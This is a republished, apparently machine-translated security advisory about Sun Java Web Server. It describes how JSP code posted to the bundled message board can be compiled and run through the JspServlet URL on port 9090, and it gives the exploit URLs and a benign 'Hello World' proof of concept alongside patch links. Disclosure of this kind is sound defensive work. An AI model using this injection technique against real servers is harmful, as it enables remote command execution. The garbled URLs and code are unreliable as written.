SunJavaWebServer allows attackers to remotely execute arbitrary commands _ MySQL

Source: Internet
Author: User
Program involved: SolarisandWindowsNT description: SunJavaWebServer allows attackers to execute arbitrary commands remotely. Details: Sun's JavaWeb server has multiple security issues, allowing attackers to execute commands remotely with web server privileges. Its Web management module listens to port 9090 and uses http processing management commands. Com. sun. server:
Solaris and Windows NT

Description:
Sun Java Web Server allows attackers to execute arbitrary commands remotely

Details:
Sun's Java Web Server has multiple security issues, allowing attackers to remotely execute commands with web server privileges.

Its Web management module listens to port 9090 and uses http processing management commands.
"Com. sun. server. http. pagecompile. jsp92.JspServlet" servlet is used to compile and execute JSP files,
By adding the "/servlet/" prefix, remote users can use this servlet to compile and execute any JSP files in the Management Directory.
File.

By default, this server contains a message demonstration program that allows users to pass
Http://jws.site: 9090/examples/applications/bboard/bboard_frames.html
The documents are submitted and saved in board.html.

Attackers can input some JSP statements through the message board and then call
Use "com. sun. server. http. pagecompile. jsp92.JspServlet" to compile and execute the board.html file:

The http://jws.site: 9090/servlet/com. sun. server. http. pagecompile. jsp92.JspServlet/board.html

This causes attackers to remotely execute commands with web server privileges.


The following code is only used to test and study this vulnerability. if you use it for an improper approach, you are solely responsible for the consequences.


Use the following JSP code to print "Hello World ":
% String s = "Hello World"; %>
<% = S %>
Submit in message board:
Http://jws.site: 9090/examples/applications/bboard/bboard_frames.html
Then confirm that you have submitted through http://jws.site: 9090/board.html.
Compile and execute the code below:
Http://jws.site: 9090/servlet/com. sun. server. http. pagecompile




Solution:
Download and install the patch:
Http://java.sun.com/products/java-server/jws113patch3.html
Http://java.sun.com/products/java-server/jws20patch3.html


Additional information:
Saumil Shah (saumil.shah@foundstone.com)
Shreeraj Shah (shreeraj.shah@foundstone.com)
Stuart McClure (stuart.mcclure@foundstone.com)
Foundstone, Inc. (http://www.foundstone.com)



Related sites:
Http://www.foundstone.com

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.